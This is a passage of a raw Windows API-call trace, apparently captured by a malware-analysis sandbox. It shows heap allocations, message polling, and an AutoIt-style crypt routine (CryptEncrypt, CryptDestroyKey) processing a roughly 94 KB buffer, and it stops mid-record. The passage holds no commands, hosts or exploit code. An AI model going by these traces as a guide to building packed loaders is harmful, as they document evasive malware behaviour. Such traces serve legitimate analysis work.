Flags=0x0, Size=0x10) returned 0x88cec8 [0038.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0038.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0038.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0038.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0038.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0038.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0038.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0038.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0038.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0038.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0038.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0038.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0038.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0038.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0038.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0038.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0038.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0038.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0038.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0038.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0038.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0038.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0038.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0038.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0038.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0038.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0038.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0038.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0038.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0038.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0038.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0038.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.150] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.150] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da3c8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3c8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0038.150] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.151] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.151] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.151] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.151] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.151] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.151] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.151] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.151] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0038.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.151] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.151] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.151] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.151] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.151] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.151] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.151] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.151] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0038.151] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.152] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.152] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.152] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.152] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.152] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0038.152] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.152] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.153] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x16f92, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x16fa0) returned 1 [0038.153] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.153] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.153] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.153] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.153] CharLowerBuffW (in: lpsz="byte[94113]", cchLength=0xb | out: lpsz="byte[94113]") returned 0xb [0038.153] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.155] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.155] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.155] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.157] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.157] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x962f48*, pdwDataLen=0x6ae220*=0x16f92, dwBufLen=0x16fa0 | out: pbData=0x962f48*, pdwDataLen=0x6ae220*=0x16fa0) returned 1 [0038.158] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.158] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.158] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.160] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.160] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.160] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.160] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0038.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.160] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.160] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.160] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.161] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0038.161] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.161] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.161] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.161] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.161] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0038.161] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.169] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.169] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.169] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.174] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.174] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.174] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0038.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.174] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.174] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.174] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0038.174] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.174] CryptDestroyKey (hKey=0x7c2200) returned 1 [0038.174] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.174] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.175] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0038.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.175] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.175] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.175] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0038.175] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0038.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0038.175] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.175] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.175] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0038.175] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0038.175] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, 